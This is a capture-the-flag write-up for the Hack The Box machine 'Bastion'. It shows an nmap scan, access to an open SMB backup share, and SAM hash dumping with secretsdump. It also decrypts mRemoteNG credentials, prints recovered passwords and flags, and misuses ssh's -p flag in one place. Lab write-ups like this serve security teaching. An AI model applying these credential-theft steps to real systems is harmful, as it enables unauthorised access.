Writeup: Hack The Box - Machines - Bastion

(Updated: )
writeups
,

Description

  • Name: Bastion
  • IP: 10.10.10.134
  • Author: L4jmpe
  • Difficulty: ?/10

Discovery

nmap -sC -sV -Pn -p- -T5 --min-rate 1000 --max-retries 5 10.10.10.134

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-18 23:39 CEST
Nmap scan report for 10.10.10.134
Host is up (0.027s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -38m22s, deviation: 1h09m16s, median: 1m36s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-06-18T23:42:14+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-06-18 23:42:17
|_  start_date: 2019-06-18 23:22:10

From the output we can notice that the server is running Samba (smb).

Pwn user

To list all the shares we can use the command smbclient -L 10.10.10.134 typing an empty workgroup, which outputs:

1
2
3
4
5
6
7
8
9
10
11
12
13
Unable to initialize messaging context
smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
Enter WORKGROUP\s41m0n's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Now we can try to access them (or mounting the share mount -t cifs \\10.10.10.134\Backups mountedBackup), figuring out that the can only access Backups and IPC$. Exploring the first one, we’re led to the folder WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351 which contains a bunch of xml files plus two vhd.

By definition: 

1
VHD (Virtual Hard Disk) is a file format which represents a virtual hard disk drive (HDD). It may contain what is found on a physical HDD, such as disk partitions and a file system, which in turn can contain files and folders. It is typically used as the hard disk of a virtual machine.

By using the command virt-list-filesystems mountedBackup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd provided by libguestfs, it is possible to see all the virtual hard disk partitions (in our case both have /dev/sda1).

Mount those vhd in a your temporary local directory: guestmount --add mountedBackup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --ro ~/Desktop/mntpt1 -m /dev/sda1.

While the first one does not provide useful data, the second one is way more interesting: in fact we can try to explore the Windows directory in order to see if there is a SAM file, which suggests us that it can hopefully be cracked using also the SECURITY and SYSTEM files.

Once retrieved those files, we can use a script supplied by impacket to dump the possible passwords from our files:

1
2
3
4
5
6
7
8
9
10
11
12
$ python examples/secretsdump.py -sam ~/Desktop/SAM -security ~/Desktop/SECURITY -system ~/Desktop/SYSTEM LOCAL

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd

The password for user L4mpje is bureaulampje! 

1
2
3
ssh L4mpje@10.10.10.134 -p *************
l4mpje@BASTION C:\Users\L4mpje>type Desktop\user.txt                                                               
9bfe57d5c3309db3a151772f9d86c6cd

And that is the user flag :)

Pwn root

For the root part we have to find a vulnerable service/program. By searching through the directories, we notice that mremoteng application is installed. This is a tool for password-management, whose bug in the previous version could allow to crack the password. It stores its data in the directory (in our case) C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml inside that xml file. In fact by opening it, it is possible to see that there are the hashed password.

Cracking them using that vulnerability is quite easy, we can use for example mremoteng-decrypt:

1
2
$ python mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2

Now we have the password for Administrator!

1
2
3
4
$ ssh Administrator@10.10.10.134 -p thXLHM96BeKL0ER2
administrator@BASTION C:\Users\Administrator>cd Desktop                                                                         
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt                                                              
958850b91811676ed6620a9c430e65c8

We got the root flag.

Vulnerability description link: cosine security